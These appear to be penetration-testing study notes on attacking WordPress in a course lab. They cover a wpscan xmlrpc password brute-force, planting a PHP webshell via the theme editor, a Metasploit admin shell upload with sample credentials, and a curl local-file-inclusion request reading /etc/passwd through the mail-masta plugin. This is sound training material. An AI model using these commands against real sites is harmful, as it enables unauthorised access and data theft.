Skip to content

Attacking Wordpress

Login Bruteforce

  • wpscan can be used to brtueforce login
  • it found 2 users: admin and doug
  • it uses 2 kinds of attacks:
    • xmlrpc - use wp api to make attempts through the /xmlrpc.php page
    • wp-login - standard attack on the login page
  • The xmlrpc method is preferred as it’s faster.

login bruteforce

  • sudo wpscan --password-attack xmlrpc -t 20 -U doug -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
    • --password-attack: specify the type of attack
    • -U: list of users or a file
    • -P: password file
    • -t: threads

Code Execution

Using themes

  • when we can login as admin, go to the Theme Editor in themes
  • now, update a .php page in a theme to include the PHP webshell.
  • now, find the /theme/folder (might have to use google) - eg: /wp-content/themes/twentytwenty/404.php
  • as we added a webshell:
    • http://blog.inlanefreight.local/wp-content/themes/twentytwenty/404.php?0=ls+/

Using metasploit

use exploit/unix/webapp/wp_admin_shell_upload

set username john
set password firebird1
set lhost 10.10.14.15 
set rhost 10.129.42.195  
set VHOST blog.inlanefreight.local
  • Note: During an assessment, we would want to make every attempt to clean up this artifact from the client system and, regardless of whether we were able to remove it or not, we should list this artifact in our report appendices. At the very least, our report should have an appendix section that lists the following information—more on this in a later module.
    • Exploited systems (hostname/IP and method of exploitation)
    • Compromised users (account name, method of compromise, account type (local or domain))
    • Artifacts created on systems
    • Changes (such as adding a local admin user or modifying group membership)

Using Known Vulnerabilities

  • https://wpscan.com/statistics - wordpress vulnerability statistics
  • Note: We can use the waybackurls tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

mail-masta

  • not supported anymore but if used once and forgotten by the devs
  • curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

wpDiscuz

  • for v7.0.4 - https://www.exploit-db.com/exploits/49967